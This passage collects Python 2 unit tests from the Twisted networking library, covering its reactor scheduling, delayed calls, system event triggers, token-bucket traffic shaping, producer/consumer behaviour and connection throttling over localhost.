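proto = Greeter()
proto.makeConnection(transport)
print repr(transport.value())   # -> 'hello\r\n'
```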
#### File: twisted/test/test_assertions.py
```python
from twisted.trial import unittest
from twisted.python import failure
class Assertions(unittest.TestCase):
def testExceptions(self):
exc = self.assertRaises(ZeroDivisionError, lambda: 1/0)
assert isinstance(exc, ZeroDivisionError), "ZeroDivisionError instance not returned"
for func in [lambda: 1/0, lambda: None]:
try:
self.assertRaises(ValueError, func)
except unittest.FailTest:
# Success!
pass
except:
raise unittest.FailTest("FailTest not raised", failure.Failure().getTraceback())
else:
raise unittest.FailTest("FailTest not raised")
```
#### File: twisted/test/test_extensions.py
```python
import os
from os.path import join as opj
from twisted.trial import unittest
from twisted.python import util
class CorrectComments(unittest.TestCase):
def testNoSlashSlashComments(self):
urlarg = util.sibpath(__file__, opj(os.pardir, 'protocols', '_c_urlarg.c'))
contents = file(urlarg).read()
self.assertEquals(contents.find('//'), -1)
```
#### File: twisted/test/test_htb.py
```python
__version__ = '$Revision: 1.3 $'[11:-2]
from twisted.trial import unittest
from twisted.protocols import htb
class DummyClock:
time = 0
def set(self, when):
self.time = when
def __call__(self):
return self.time
class SomeBucket(htb.Bucket):
maxburst = 100
rate = 2
class TestBucketBase(unittest.TestCase):
def setUp(self):
self._realTimeFunc = htb.time
self.clock = DummyClock()
htb.time = self.clock
def tearDown(self):
htb.time = self._realTimeFunc
class TestBucket(TestBucketBase):
def testBucketSize(self):
"""Testing the size of the bucket."""
b = SomeBucket()
fit = b.add(1000)
self.failUnlessEqual(100, fit)
def testBucketDrian(self):
"""Testing the bucket's drain rate."""
b = SomeBucket()
fit = b.add(1000)
self.clock.set(10)
fit = b.add(1000)
self.failUnlessEqual(20, fit)
class TestBucketNesting(TestBucketBase):
def setUp(self):
TestBucketBase.setUp(self)
self.parent = SomeBucket()
self.child1 = SomeBucket(self.parent)
self.child2 = SomeBucket(self.parent)
def testBucketParentSize(self):
# Use up most of the parent bucket.
self.child1.add(90)
fit = self.child2.add(90)
self.failUnlessEqual(10, fit)
def testBucketParentRate(self):
# Make the parent bucket drain slower.
self.parent.rate = 1
# Fill both child1 and parent.
self.child1.add(100)
self.clock.set(10)
fit = self.child1.add(100)
# How much room was there? The child bucket would have had 20,
# but the parent bucket only ten (so no, it wouldn't make too much
# sense to have a child bucket draining faster than its parent in a real
# application.)
self.failUnlessEqual(10, fit)
# TODO: Test the Transport stuff?
from test_pcp import DummyConsumer
class ConsumerShaperTest(TestBucketBase):
def setUp(self):
TestBucketBase.setUp(self)
self.underlying = DummyConsumer()
self.bucket = SomeBucket()
self.shaped = htb.ShapedConsumer(self.underlying, self.bucket)
def testRate(self):
# Start off with a full bucket, so the burst-size doesn't factor in
# to the calculations.
delta_t = 10
self.bucket.add(100)
self.shaped.write("x" * 100)
self.clock.set(delta_t)
self.shaped.resumeProducing()
self.failUnlessEqual(len(self.underlying.getvalue()),
delta_t * self.bucket.rate)
def testBucketRefs(self):
self.failUnlessEqual(self.bucket._refcount, 1)
self.shaped.stopProducing()
self.failUnlessEqual(self.bucket._refcount, 0)
```
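For orientation, a hedged sketch of the `htb.Bucket` behaviour these tests exercise. The class attributes mirror `SomeBucket` above, and the value in the comment follows from the `testBucketSize` expectation rather than from any claim about other configurations.

```python
# Sketch: a token bucket as exercised by the tests above.
from twisted.protocols import htb

class DemoBucket(htb.Bucket):
    maxburst = 100   # the bucket holds at most 100 "tokens"
    rate = 2         # and drains 2 tokens per second

b = DemoBucket()
print b.add(1000)    # -> 100: only a full burst fits into an empty bucket
```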
#### File: twisted/test/test_internet.py
```python
from twisted.trial import unittest
from twisted.internet import reactor, protocol, error, abstract, defer
from twisted.internet import interfaces, base
from twisted.test.time_helpers import Clock
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
from twisted.internet.defer import Deferred, maybeDeferred
from twisted.python import util
import os
import sys
import time
import types
class SystemEventTestCase(unittest.TestCase):
def setUp(self):
self.triggers = []
def addTrigger(self, event, phase, func):
t = reactor.addSystemEventTrigger(event, phase, func)
self.triggers.append(t)
return t
def removeTrigger(self, trigger):
reactor.removeSystemEventTrigger(trigger)
self.triggers.remove(trigger)
def tearDown(self):
for t in self.triggers:
try:
reactor.removeSystemEventTrigger(t)
except:
pass
def testTriggerSystemEvent1(self):
l = []
l2 = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
def _appendToList2(l2=l2):
l2.append(1)
## d.addCallback(lambda x: sys.stdout.write("firing d\n"))
## d2.addCallback(lambda x: sys.stdout.write("firing d2\n"))
r = reactor
self.addTrigger("before", "test", _appendToList)
self.addTrigger("during", "test", _appendToList)
self.addTrigger("after", "test", _appendToList)
self.assertEquals(len(l), 0, "Nothing happened yet.")
r.fireSystemEvent("test")
r.iterate()
self.assertEquals(len(l), 3, "Should have filled the list.")
l[:]=[]
self.addTrigger("before", "defer", _returnDeferred)
self.addTrigger("before", "defer", _returnDeferred2)
self.addTrigger("during", "defer", _appendToList)
self.addTrigger("after", "defer", _appendToList)
r.fireSystemEvent("defer")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
d.callback(None)
self.assertEquals(len(l), 0, "Event still should not have fired yet.")
d2.callback(None)
self.assertEquals(len(l), 2)
l[:]=[]
a = self.addTrigger("before", "remove", _appendToList)
b = self.addTrigger("before", "remove", _appendToList2)
self.removeTrigger(b)
r.fireSystemEvent("remove")
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 0)
def testTriggerSystemEvent2(self):
# one of the "before" trigger functions returns a deferred. A later
# "before" trigger fires the deferred. A third before runs. Then a
# "during" should be run. One of the failure modes for the old
# cReactor code is to start the "during" as soon as the deferred
# fires, rather than waiting for the "before" phase to be finished
l = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _fireDeferred(d=d):
d.callback(None)
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
r = reactor
# to test this properly, the triggers must fire in this sequence:
# _returnDeferred, _fireDeferred, _returnDeferred2 . cReactor happens
# to run triggers in the order in which they were added.
self.addTrigger("before", "defer2", _returnDeferred)
self.addTrigger("before", "defer2", _fireDeferred)
self.addTrigger("before", "defer2", _returnDeferred2)
self.addTrigger("during", "defer2", _appendToList)
self.addTrigger("after", "defer2", _appendToList)
r.fireSystemEvent("defer2")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
d2.callback(None)
self.assertEquals(len(l), 2)
def testTriggerSystemEvent3(self):
# make sure reactor can survive the loss of an event type while
# waiting for a before-trigger's Deferred to fire
l = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _appendToList(l=l):
l.append(1)
def _ignore(failure):
return None
r = reactor
b1 = self.addTrigger("before", "defer3", _returnDeferred)
b2 = self.addTrigger("after", "defer3", _appendToList)
r.fireSystemEvent("defer3")
self.assertEquals(len(l), 0, "Event should not have fired yet.")
self.removeTrigger(b1)
self.removeTrigger(b2)
try:
d.callback(None) # cReactor gives errback to deferred
except ValueError:
pass
self.assertEquals(len(l), 0)
d.addErrback(_ignore)
def testTriggerSystemEvent4(self):
# make sure interleaved event types do not interfere with each other.
# Old cReactor code had a single defer_list for all event types.
l = []
l2 = []
d = Deferred()
d2 = Deferred()
def _returnDeferred(d=d):
return d
def _returnDeferred2(d2=d2):
return d2
def _appendToList(l=l):
l.append(1)
def _appendToList2(l2=l2):
l2.append(1)
r = reactor
self.addTrigger("before", "event1", _returnDeferred)
self.addTrigger("after", "event1", _appendToList)
self.addTrigger("before", "event2", _returnDeferred2)
self.addTrigger("after", "event2", _appendToList2)
r.fireSystemEvent("event1")
# event1 should be waiting on deferred 'd'
r.fireSystemEvent("event2")
# event2 should be waiting on deferred 'd2'
self.assertEquals(len(l), 0, "Event should not have fired yet.")
self.assertEquals(len(l2), 0, "Event should not have fired yet.")
d.callback(None)
# event1 should run "during" and "after" stages
# event2 should still be waiting on d2
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 0)
d2.callback(None)
# event2 should run "during" and "after" stages
self.assertEquals(len(l), 1)
self.assertEquals(len(l2), 1)
def testTriggerSystemEvent5(self):
# make sure the reactor can handle attempts to remove bogus triggers
l = []
def _appendToList(l=l):
l.append(1)
r = reactor
b = self.addTrigger("after", "event1", _appendToList)
self.removeTrigger(b)
if type(b) == types.IntType:
bogus = b + 40
self.failUnlessRaises(ValueError,
r.removeSystemEventTrigger, bogus)
self.failUnlessRaises(TypeError,
r.removeSystemEventTrigger, None)
class InterfaceTestCase(unittest.TestCase):
"""
Tests for a random pile of crap in twisted.internet, I suppose.
"""
def test_callLater(self):
"""
Test that a DelayedCall really calls the function it is supposed to call.
"""
d = Deferred()
reactor.callLater(0, d.callback, None)
d.addCallback(self.assertEqual, None)
return d
def test_cancelDelayedCall(self):
"""
Test that when a DelayedCall is cancelled it does not run.
"""
called = []
def function():
called.append(None)
call = reactor.callLater(0, function)
call.cancel()
# Schedule a call in two "iterations" to check to make sure that the
# above call never ran.
d = Deferred()
def check():
try:
self.assertEqual(called, [])
except:
d.errback()
else:
d.callback(None)
reactor.callLater(0, reactor.callLater, 0, check)
return d
def test_cancelCancelledDelayedCall(self):
"""
Test that cancelling a DelayedCall which has already been cancelled
raises the appropriate exception.
"""
call = reactor.callLater(0, lambda: None)
call.cancel()
self.assertRaises(error.AlreadyCancelled, call.cancel)
def test_cancelCalledDelayedCallSynchronous(self):
"""
Test that cancelling a DelayedCall in the DelayedCall's function as
that function is being invoked by the DelayedCall raises the
appropriate exception.
"""
d = Deferred()
def later():
try:
self.assertRaises(error.AlreadyCalled, call.cancel)
except:
d.errback()
else:
d.callback(None)
call = reactor.callLater(0, later)
return d
def test_cancelCalledDelayedCallAsynchronous(self):
"""
Test that cancelling a DelayedCall after it has run its function
raises the appropriate exception.
"""
d = Deferred()
def check():
try:
self.assertRaises(error.AlreadyCalled, call.cancel)
except:
d.errback()
else:
d.callback(None)
def later():
reactor.callLater(0, check)
call = reactor.callLater(0, later)
return d
def testCallLaterDelayAndReset(self):
clock = Clock()
clock.install()
try:
callbackTimes = [None, None]
def resetCallback():
callbackTimes[0] = clock()
def delayCallback():
callbackTimes[1] = clock()
ireset = reactor.callLater(2, resetCallback)
idelay = reactor.callLater(3, delayCallback)
clock.pump(reactor, [0, 1])
ireset.reset(2) # (now)1 + 2 = 3
idelay.delay(3) # (orig)3 + 3 = 6
clock.pump(reactor, [0, 1])
self.assertIdentical(callbackTimes[0], None)
self.assertIdentical(callbackTimes[1], None)
clock.pump(reactor, [0, 1])
self.assertEquals(callbackTimes[0], 3)
self.assertEquals(callbackTimes[1], None)
clock.pump(reactor, [0, 3])
self.assertEquals(callbackTimes[1], 6)
finally:
clock.uninstall()
def testCallLaterTime(self):
d = reactor.callLater(10, lambda: None)
try:
self.failUnless(d.getTime() - (time.time() + 10) < 1)
finally:
d.cancel()
def testCallInNextIteration(self):
calls = []
def f1():
calls.append('f1')
reactor.callLater(0.0, f2)
def f2():
calls.append('f2')
reactor.callLater(0.0, f3)
def f3():
calls.append('f3')
reactor.callLater(0, f1)
self.assertEquals(calls, [])
reactor.iterate()
self.assertEquals(calls, ['f1'])
reactor.iterate()
self.assertEquals(calls, ['f1', 'f2'])
reactor.iterate()
self.assertEquals(calls, ['f1', 'f2', 'f3'])
def testCallLaterOrder(self):
l = []
l2 = []
def f(x):
l.append(x)
def f2(x):
l2.append(x)
def done():
self.assertEquals(l, range(20))
def done2():
self.assertEquals(l2, range(10))
for n in range(10):
reactor.callLater(0, f, n)
for n in range(10):
reactor.callLater(0, f, n+10)
reactor.callLater(0.1, f2, n)
reactor.callLater(0, done)
reactor.callLater(0.1, done2)
d = Deferred()
reactor.callLater(0.2, d.callback, None)
return d
testCallLaterOrder.todo = "See bug 1396"
testCallLaterOrder.skip = "Trial bug, todo doesn't work! See bug 1397"
def testCallLaterOrder2(self):
# This time destroy the clock resolution so that it fails reliably
# even on systems that don't have a crappy clock resolution.
def seconds():
return int(time.time())
from twisted.internet import base
from twisted.python import runtime
base_original = base.seconds
runtime_original = runtime.seconds
base.seconds = seconds
runtime.seconds = seconds
def cleanup(x):
runtime.seconds = runtime_original
base.seconds = base_original
return x
return maybeDeferred(self.testCallLaterOrder).addBoth(cleanup)
testCallLaterOrder2.todo = "See bug 1396"
testCallLaterOrder2.skip = "Trial bug, todo doesn't work! See bug 1397"
def testDelayedCallStringification(self):
# Mostly just make sure str() isn't going to raise anything for
# DelayedCalls within reason.
dc = reactor.callLater(0, lambda x, y: None, 'x', y=10)
str(dc)
dc.reset(5)
str(dc)
dc.cancel()
str(dc)
dc = reactor.callLater(0, lambda: None, x=[({'hello': u'world'}, 10j), reactor], *range(10))
str(dc)
dc.cancel()
str(dc)
def calledBack(ignored):
str(dc)
d = Deferred().addCallback(calledBack)
dc = reactor.callLater(0, d.callback, None)
str(dc)
return d
def testDelayedCallSecondsOverride(self):
"""
Test that the C{seconds} argument to DelayedCall gets used instead of
the default timing function, if it is not None.
"""
def seconds():
return 10
dc = base.DelayedCall(5, lambda: None, (), {}, lambda dc: None, lambda dc: None, seconds)
self.assertEquals(dc.getTime(), 5)
dc.reset(3)
self.assertEquals(dc.getTime(), 13)
class CallFromThreadTests(unittest.TestCase):
def testWakeUp(self):
# Make sure other threads can wake up the reactor
d = Deferred()
def wake():
time.sleep(0.1)
# callFromThread will call wakeUp for us
reactor.callFromThread(d.callback, None)
reactor.callInThread(wake)
return d
if interfaces.IReactorThreads(reactor, None) is None:
testWakeUp.skip = "Nothing to wake up for without thread support"
def _stopCallFromThreadCallback(self):
self.stopped = True
def _callFromThreadCallback(self, d):
reactor.callFromThread(self._callFromThreadCallback2, d)
reactor.callLater(0, self._stopCallFromThreadCallback)
def _callFromThreadCallback2(self, d):
try:
self.assert_(self.stopped)
except:
# Send the error to the deferred
d.errback()
else:
d.callback(None)
def testCallFromThreadStops(self):
"""
Ensure that callFromThread from inside a callFromThread
callback doesn't sit in an infinite loop and lets other
things happen too.
"""
self.stopped = False
d = defer.Deferred()
reactor.callFromThread(self._callFromThreadCallback, d)
return d
class ReactorCoreTestCase(unittest.TestCase):
def setUp(self):
self.triggers = []
self.timers = []
def addTrigger(self, event, phase, func):
t = reactor.addSystemEventTrigger(event, phase, func)
self.triggers.append(t)
return t
def removeTrigger(self, trigger):
reactor.removeSystemEventTrigger(trigger)
self.triggers.remove(trigger)
def addTimer(self, when, func):
t = reactor.callLater(when, func)
self.timers.append(t)
return t
def removeTimer(self, timer):
try:
timer.cancel()
except error.AlreadyCalled:
pass
self.timers.remove(timer)
def tearDown(self):
for t in self.triggers:
try:
reactor.removeSystemEventTrigger(t)
except:
pass
def testRun(self):
"""
Test that reactor.crash terminates reactor.run
"""
for i in xrange(3):
reactor.callLater(0.01, reactor.crash)
reactor.run()
def testIterate(self):
"""
Test that reactor.iterate(0) doesn't block
"""
start = time.time()
# twisted timers are distinct from the underlying event loop's
# timers, so this fail-safe probably won't keep a failure from
# hanging the test
t = reactor.callLater(10, reactor.crash)
reactor.iterate(0) # shouldn't block
stop = time.time()
elapsed = stop - start
#print "elapsed", elapsed
self.failUnless(elapsed < 8)
t.cancel()
def test_crash(self):
"""
reactor.crash should NOT fire shutdown triggers
"""
events = []
self.addTrigger(
"before", "shutdown",
lambda: events.append(("before", "shutdown")))
# reactor.crash called from an "after-startup" trigger is too early
# for the gtkreactor: gtk_mainloop is not yet running. Same is true
# when called with reactor.callLater(0). Must be >0 seconds in the
# future to let gtk_mainloop start first.
reactor.callWhenRunning(
reactor.callLater, 0, reactor.crash)
reactor.run()
self.failIf(events, "reactor.crash invoked shutdown triggers, but it "
"isn't supposed to.")
# XXX Test that reactor.stop() invokes shutdown triggers
class DelayedTestCase(unittest.TestCase):
def setUp(self):
self.finished = 0
self.counter = 0
self.timers = {}
self.deferred = defer.Deferred()
# ick. Sometimes there are magic timers already running:
# popsicle.Freezer.tick . Kill off all such timers now so they won't
# interfere with the test. Of course, this kind of requires that
# getDelayedCalls already works, so certain failure modes won't be
# noticed.
if not hasattr(reactor, "getDelayedCalls"):
return
for t in reactor.getDelayedCalls():
t.cancel()
reactor.iterate() # flush timers
def tearDown(self):
for t in self.timers.values():
t.cancel()
def checkTimers(self):
l1 = self.timers.values()
l2 = list(reactor.getDelayedCalls())
# There should be at least the calls we put in. There may be other
# calls that are none of our business and that we should ignore,
# though.
missing = []
for dc in l1:
if dc not in l2:
missing.append(dc)
if missing:
self.finished = 1
self.failIf(missing, "Should have been missing no calls, instead was missing " + repr(missing))
def callback(self, tag):
del self.timers[tag]
self.checkTimers()
def addCallback(self, tag):
self.callback(tag)
self.addTimer(15, self.callback)
def done(self, tag):
self.finished = 1
self.callback(tag)
self.deferred.callback(None)
def addTimer(self, when, callback):
self.timers[self.counter] = reactor.callLater(when * 0.01, callback,
self.counter)
self.counter += 1
self.checkTimers()
def testGetDelayedCalls(self):
if not hasattr(reactor, "getDelayedCalls"):
return
# This is not a race because we don't do anything which might call
# the reactor until we have all the timers set up. If we did, this
# test might fail on slow systems.
self.checkTimers()
self.addTimer(35, self.done)
self.addTimer(20, self.callback)
self.addTimer(30, self.callback)
which = self.counter
self.addTimer(29, self.callback)
self.addTimer(25, self.addCallback)
self.addTimer(26, self.callback)
self.timers[which].cancel()
del self.timers[which]
self.checkTimers()
self.deferred.addCallback(lambda x : self.checkTimers())
return self.deferred
def testActive(self):
dcall = reactor.callLater(0, lambda: None)
self.assertEquals(dcall.active(), 1)
reactor.iterate()
self.assertEquals(dcall.active(), 0)
resolve_helper = """
import %(reactor)s
%(reactor)s.install()
from twisted.internet import reactor
class Foo:
def __init__(self):
reactor.callWhenRunning(self.start)
self.timer = reactor.callLater(3, self.failed)
def start(self):
reactor.resolve('localhost').addBoth(self.done)
def done(self, res):
print 'done', res
reactor.stop()
def failed(self):
print 'failed'
self.timer = None
reactor.stop()
f = Foo()
reactor.run()
"""
class ChildResolveProtocol(protocol.ProcessProtocol):
def __init__(self, onCompletion):
self.onCompletion = onCompletion
def connectionMade(self):
self.output = []
self.error = []
def outReceived(self, out):
self.output.append(out)
def errReceived(self, err):
self.error.append(err)
def processEnded(self, reason):
self.onCompletion.callback((reason, self.output, self.error))
self.onCompletion = None
class Resolve(unittest.TestCase):
def testChildResolve(self):
# I've seen problems with reactor.run under gtk2reactor. Spawn a
# child which just does reactor.resolve after the reactor has
# started, fail if it does not complete in a timely fashion.
helperPath = os.path.abspath(self.mktemp())
helperFile = open(helperPath, 'w')
# Eeueuuggg
reactorName = reactor.__module__
helperFile.write(resolve_helper % {'reactor': reactorName})
helperFile.close()
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
helperDeferred = Deferred()
helperProto = ChildResolveProtocol(helperDeferred)
reactor.spawnProcess(helperProto, sys.executable, ("python", "-u", helperPath), env)
def cbFinished((reason, output, error)):
# If the output is "done 127.0.0.1\n" we don't really care what
# else happened.
output = ''.join(output)
if output != 'done 127.0.0.1\n':
self.fail((
"The child process failed to produce the desired results:\n"
" Reason for termination was: %r\n"
" Output stream was: %r\n"
" Error stream was: %r\n") % (reason.getErrorMessage(), output, ''.join(error)))
helperDeferred.addCallback(cbFinished)
return helperDeferred
if not interfaces.IReactorProcess(reactor, None):
Resolve.skip = "cannot run test: reactor doesn't support IReactorProcess"
class Counter:
index = 0
def add(self):
self.index = self.index + 1
class Order:
stage = 0
def a(self):
if self.stage != 0: raise RuntimeError
self.stage = 1
def b(self):
if self.stage != 1: raise RuntimeError
self.stage = 2
def c(self):
if self.stage != 2: raise RuntimeError
self.stage = 3
class callFromThreadTestCase(unittest.TestCase):
"""Task scheduling from threads tests."""
if interfaces.IReactorThreads(reactor, None) is None:
skip = "Nothing to test without thread support"
def schedule(self, *args, **kwargs):
"""Override in subclasses."""
reactor.callFromThread(*args, **kwargs)
def testScheduling(self):
c = Counter()
for i in range(100):
self.schedule(c.add)
for i in range(100):
reactor.iterate()
self.assertEquals(c.index, 100)
def testCorrectOrder(self):
o = Order()
self.schedule(o.a)
self.schedule(o.b)
self.schedule(o.c)
reactor.iterate()
reactor.iterate()
reactor.iterate()
self.assertEquals(o.stage, 3)
def testNotRunAtOnce(self):
c = Counter()
self.schedule(c.add)
# scheduled tasks should not be run at once:
self.assertEquals(c.index, 0)
reactor.iterate()
self.assertEquals(c.index, 1)
class MyProtocol(protocol.Protocol):
"""Sample protocol."""
class MyFactory(protocol.Factory):
"""Sample factory."""
protocol = MyProtocol
class ProtocolTestCase(unittest.TestCase):
def testFactory(self):
factory = MyFactory()
protocol = factory.buildProtocol(None)
self.assertEquals(protocol.factory, factory)
        self.assert_(isinstance(protocol, factory.protocol))
class DummyProducer(object):
"""
Very uninteresting producer implementation used by tests to ensure the
right methods are called by the consumer with which it is registered.
@type events: C{list} of C{str}
@ivar events: The producer/consumer related events which have happened to
this producer. Strings in this list may be C{'resume'}, C{'stop'}, or
C{'pause'}. Elements are added as they occur.
"""
def __init__(self):
self.events = []
def resumeProducing(self):
self.events.append('resume')
def stopProducing(self):
self.events.append('stop')
def pauseProducing(self):
self.events.append('pause')
class SillyDescriptor(abstract.FileDescriptor):
"""
A descriptor whose data buffer gets filled very fast.
Useful for testing FileDescriptor's IConsumer interface, since
the data buffer fills as soon as at least four characters are
written to it, and gets emptied in a single doWrite() cycle.
"""
bufferSize = 3
connected = True
def writeSomeData(self, data):
"""
Always write all data.
"""
return len(data)
def startWriting(self):
"""
Do nothing: bypass the reactor.
"""
stopWriting = startWriting
class ReentrantProducer(DummyProducer):
"""
Similar to L{DummyProducer}, but with a resumeProducing method which calls
back into an L{IConsumer} method of the consumer against which it is
registered.
@ivar consumer: The consumer with which this producer has been or will
be registered.
@ivar methodName: The name of the method to call on the consumer inside
C{resumeProducing}.
@ivar methodArgs: The arguments to pass to the consumer method invoked in
C{resumeProducing}.
"""
def __init__(self, consumer, methodName, *methodArgs):
super(ReentrantProducer, self).__init__()
self.consumer = consumer
self.methodName = methodName
self.methodArgs = methodArgs
def resumeProducing(self):
super(ReentrantProducer, self).resumeProducing()
getattr(self.consumer, self.methodName)(*self.methodArgs)
class TestProducer(unittest.TestCase):
"""
Test abstract.FileDescriptor's consumer interface.
"""
def test_doubleProducer(self):
"""
Verify that registering a non-streaming producer invokes its
resumeProducing() method and that you can only register one producer
at a time.
"""
fd = abstract.FileDescriptor()
fd.connected = 1
dp = DummyProducer()
fd.registerProducer(dp, 0)
self.assertEquals(dp.events, ['resume'])
self.assertRaises(RuntimeError, fd.registerProducer, DummyProducer(), 0)
def test_unconnectedFileDescriptor(self):
"""
Verify that registering a producer when the connection has already
been closed invokes its stopProducing() method.
"""
fd = abstract.FileDescriptor()
fd.disconnected = 1
dp = DummyProducer()
fd.registerProducer(dp, 0)
self.assertEquals(dp.events, ['stop'])
def _dontPausePullConsumerTest(self, methodName):
descriptor = SillyDescriptor()
producer = DummyProducer()
descriptor.registerProducer(producer, streaming=False)
self.assertEqual(producer.events, ['resume'])
del producer.events[:]
# Fill up the descriptor's write buffer so we can observe whether or
# not it pauses its producer in that case.
getattr(descriptor, methodName)('1234')
self.assertEqual(producer.events, [])
def test_dontPausePullConsumerOnWrite(self):
"""
Verify that FileDescriptor does not call producer.pauseProducing() on a
non-streaming pull producer in response to a L{IConsumer.write} call
which results in a full write buffer. Issue #2286.
"""
return self._dontPausePullConsumerTest('write')
def test_dontPausePullConsumerOnWriteSequence(self):
"""
Like L{test_dontPausePullConsumerOnWrite}, but for a call to
C{writeSequence} rather than L{IConsumer.write}.
C{writeSequence} is not part of L{IConsumer}, but
L{abstract.FileDescriptor} has supported consumery behavior in response
to calls to L{writeSequence} forever.
"""
return self._dontPausePullConsumerTest('writeSequence')
def _reentrantStreamingProducerTest(self, methodName):
descriptor = SillyDescriptor()
producer = ReentrantProducer(descriptor, methodName, 'spam')
descriptor.registerProducer(producer, streaming=True)
# Start things off by filling up the descriptor's buffer so it will
# pause its producer.
getattr(descriptor, methodName)('spam')
# Sanity check - make sure that worked.
self.assertEqual(producer.events, ['pause'])
del producer.events[:]
# After one call to doWrite, the buffer has been emptied so the
# FileDescriptor should resume its producer. That will result in an
# immediate call to FileDescriptor.write which will again fill the
# buffer and result in the producer being paused.
descriptor.doWrite()
self.assertEqual(producer.events, ['resume', 'pause'])
del producer.events[:]
# After a second call to doWrite, the exact same thing should have
# happened. Prior to the bugfix for which this test was written,
# FileDescriptor would have incorrectly believed its producer was
# already resumed (it was paused) and so not resume it again.
descriptor.doWrite()
self.assertEqual(producer.events, ['resume', 'pause'])
def test_reentrantStreamingProducerUsingWrite(self):
"""
Verify that FileDescriptor tracks producer's paused state correctly.
Issue #811, fixed in revision r12857.
"""
return self._reentrantStreamingProducerTest('write')
def test_reentrantStreamingProducerUsingWriteSequence(self):
"""
Like L{test_reentrantStreamingProducerUsingWrite}, but for calls to
C{writeSequence}.
C{writeSequence} is B{not} part of L{IConsumer}, however
C{abstract.FileDescriptor} has supported consumery behavior in response
to calls to C{writeSequence} forever.
"""
return self._reentrantStreamingProducerTest('writeSequence')
class PortStringification(unittest.TestCase):
if interfaces.IReactorTCP(reactor, None) is not None:
def testTCP(self):
p = reactor.listenTCP(0, protocol.ServerFactory())
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
if interfaces.IReactorUDP(reactor, None) is not None:
def testUDP(self):
p = reactor.listenUDP(0, protocol.DatagramProtocol())
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
if interfaces.IReactorSSL(reactor, None) is not None and ssl:
def testSSL(self, ssl=ssl):
pem = util.sibpath(__file__, 'server.pem')
p = reactor.listenSSL(0, protocol.ServerFactory(), ssl.DefaultOpenSSLContextFactory(pem, pem))
portNo = p.getHost().port
self.assertNotEqual(str(p).find(str(portNo)), -1,
"%d not found in %s" % (portNo, p))
return p.stopListening()
```
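The tests above exercise the `reactor.callLater` / `IDelayedCall` scheduling API (`active`, `getTime`, `reset`, `delay`, `cancel`). Below is a minimal stand-alone sketch of that API, assuming only a default reactor; the callback name and the delays are illustrative and not taken from the test file:

```python
from twisted.internet import reactor

def sayHello():
    print 'hello from a delayed call'

# callLater returns an IDelayedCall that can be inspected and rescheduled
# at any time before it fires.
dc = reactor.callLater(2, sayHello)
print dc.active()   # true while the call is still pending
print dc.getTime()  # absolute time at which it is currently due
dc.reset(3)         # reschedule: fire 3 seconds from *now*
dc.delay(1)         # push the current deadline back by one more second

# Give the callback time to run, then shut the reactor down.
reactor.callLater(6, reactor.stop)
reactor.run()
```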
#### File: twisted/test/test_policies.py
```python
from __future__ import nested_scopes
from StringIO import StringIO
from twisted.trial import unittest
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.test.time_helpers import Clock
import time
from twisted.internet import protocol, reactor, address, defer
from twisted.protocols import policies
class StringIOWithoutClosing(StringIO):
def close(self): pass
class SimpleProtocol(protocol.Protocol):
connected = disconnected = 0
buffer = ""
def __init__(self):
self.dConnected = defer.Deferred()
self.dDisconnected = defer.Deferred()
def connectionMade(self):
self.connected = 1
self.dConnected.callback('')
def connectionLost(self, reason):
self.disconnected = 1
self.dDisconnected.callback('')
def dataReceived(self, data):
self.buffer += data
class SillyFactory(protocol.ClientFactory):
def __init__(self, p):
self.p = p
def buildProtocol(self, addr):
return self.p
class EchoProtocol(protocol.Protocol):
def pauseProducing(self):
self.paused = time.time()
def resumeProducing(self):
self.resume = time.time()
def stopProducing(self):
pass
def dataReceived(self, data):
self.transport.write(data)
class Server(protocol.ServerFactory):
protocol = EchoProtocol
class SimpleSenderProtocol(SimpleProtocol):
finished = 0
data = ''
def __init__(self, testcase):
self.testcase = testcase
def connectionMade(self):
SimpleProtocol.connectionMade(self)
self.writeSomething()
def writeSomething(self):
if self.disconnected:
if not self.finished:
self.fail()
else:
reactor.crash()
if not self.disconnected:
self.transport.write('foo')
reactor.callLater(1, self.writeSomething)
def finish(self):
self.finished = 1
self.transport.loseConnection()
def fail(self):
self.testcase.failed = 1
def dataReceived(self, data):
self.data += data
class WrapperTestCase(unittest.TestCase):
def testProtocolFactoryAttribute(self):
# Make sure protocol.factory is the wrapped factory, not the wrapping factory
f = Server()
wf = policies.WrappingFactory(f)
p = wf.buildProtocol(address.IPv4Address('TCP', '127.0.0.1', 35))
self.assertIdentical(p.wrappedProtocol.factory, f)
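# Test helper: this subclass hands back the protocol built by the wrapped
# factory unchanged (the lambda simply returns it instead of wrapping it
# again) and fires self.deferred from startFactory, so tests can wait on
# that deferred to know the listening factory has actually started.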
class WrappingFactory(policies.WrappingFactory):
protocol = lambda s, f, p: p
def startFactory(self):
policies.WrappingFactory.startFactory(self)
self.deferred.callback(None)
class ThrottlingTestCase(unittest.TestCase):
def doIterations(self, count=5):
for i in range(count):
reactor.iterate()
def testLimit(self):
server = Server()
c1, c2, c3, c4 = [SimpleProtocol() for i in range(4)]
tServer = policies.ThrottlingFactory(server, 2)
wrapTServer = WrappingFactory(tServer)
wrapTServer.deferred = defer.Deferred()
# Start listening
p = reactor.listenTCP(0, wrapTServer, interface="127.0.0.1")
n = p.getHost().port
def _connect123(results):
reactor.connectTCP("127.0.0.1", n, SillyFactory(c1))
c1.dConnected.addCallback(lambda r: reactor.connectTCP("127.0.0.1", n, SillyFactory(c2)))
c2.dConnected.addCallback(lambda r: reactor.connectTCP("127.0.0.1", n, SillyFactory(c3)))
return c3.dDisconnected
def _check123(results):
self.assertEquals([c.connected for c in c1, c2, c3], [1, 1, 1])
self.assertEquals([c.disconnected for c in c1, c2, c3], [0, 0, 1])
